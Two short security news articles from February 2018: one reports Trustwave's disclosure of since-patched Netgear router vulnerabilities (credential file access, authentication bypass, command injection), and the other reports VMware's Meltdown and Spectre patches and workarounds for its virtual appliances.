9.2.2018 securityweek Vulnerability
Security firm Trustwave has disclosed the details of several vulnerabilities affecting Netgear routers, including devices that are top-selling products on Amazon and Best Buy.

The flaws were discovered by researchers in March 2017 and they were patched by Netgear in August, September and October.

One of the high severity vulnerabilities has been described as a password recovery and file access issue affecting 17 Netgear routers and modem routers, including best-sellers such as R6400, R7000 (Nighthawk), R8000 (Nighthawk X6), and R7300DST (Nighthawk DST).

According to Trustwave, the web server shipped with these and other Netgear routers has a resource that can be abused to access files in the device’s root directory and other locations if the path is known. The exposed files can store administrator usernames and passwords, which can be leveraged to gain complete control of the device.

An unauthenticated attacker can exploit the flaw remotely if the remote management feature is enabled on the targeted device. Improperly implemented cross-site request forgery (CSRF) protections may also allow remote attacks.

Another high severity flaw affecting 17 Netgear routers, including the aforementioned best-sellers, can be exploited by an attacker to bypass authentication using a specially crafted request. Trustwave said the vulnerability can be easily exploited.

A flaw that can be exploited to execute arbitrary OS commands with root privileges without authentication has also been classified as high severity. Trustwave said command injection is possible through a chained attack that involves a CSRF token recovery vulnerability and other weaknesses.

Two other command injection vulnerabilities have been found by Trustwave researchers, but they have been rated medium severity and they only affect six Netgear router models.

One of the flaws requires authentication, but experts pointed out that an attacker can execute arbitrary commands after bypassing authentication using the aforementioned authentication bypass vulnerability.

The other medium severity command injection is related to the Wi-Fi Protected Setup (WPS). When a user presses the WPS button on a Netgear router, a bug causes WPS clients to be allowed to execute arbitrary code on the device with root privileges during the setup process.

“In other words, if an attacker can press the WPS button on the router, the router is completely compromised,” Trustwave said in an advisory.

Netgear has put a lot of effort into securing its products, especially since the launch of its bug bounty program one year ago. In 2017, the company published more than 180 security advisories describing vulnerabilities in its routers, gateways, extenders, access points, managed switches, and network-attached storage (NAS) products.


VMware Addresses Meltdown, Spectre Flaws in Virtual Appliances
9.2.2018 securityweek Vulnerability
VMware has started releasing patches and workarounds for the Virtual Appliance products affected by the recently disclosed CPU vulnerabilities known as Meltdown and Spectre.

According to an advisory published on Thursday, Meltdown and Spectre impact several VMware Virtual Appliances, including vCloud Usage Meter (UM), Identity Manager (vIDM), vCenter Server (vCSA), vSphere Data Protection (VDP), vSphere Integrated Containers (VIC) and vRealize Automation (vRA).

VMware has so far released a patch only for its VIC product, and workarounds have been made available for UM, vIDM, vCSA, and vRA. vCSA 5.5 is not affected, and neither patches nor workarounds have been released for VDP.

VMware has released separate advisories describing the specific workarounds for each product. The company advised users not to apply workarounds to other products than the one they are intended for, and pointed out that the workarounds are only meant to be a temporary solution until permanent fixes become available.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data. Billions of devices using Intel, AMD, ARM, Qualcomm and IBM processors are affected.

Intel started releasing microcode updates for its processors shortly after the flaws were disclosed, but the company decided to halt updates due to frequent reboots and unpredictable system behavior.

Following Intel’s announcement, VMware informed customers that it had decided to delay new releases of microcode updates for its ESXi hypervisor until the chipmaker addresses problems.

Intel announced this week that it has identified the root of an issue that caused systems to reboot more frequently and started releasing a new round of patches.

Intel and AMD told customers that their future products will include built-in protections against exploits such as Spectre and Meltdown.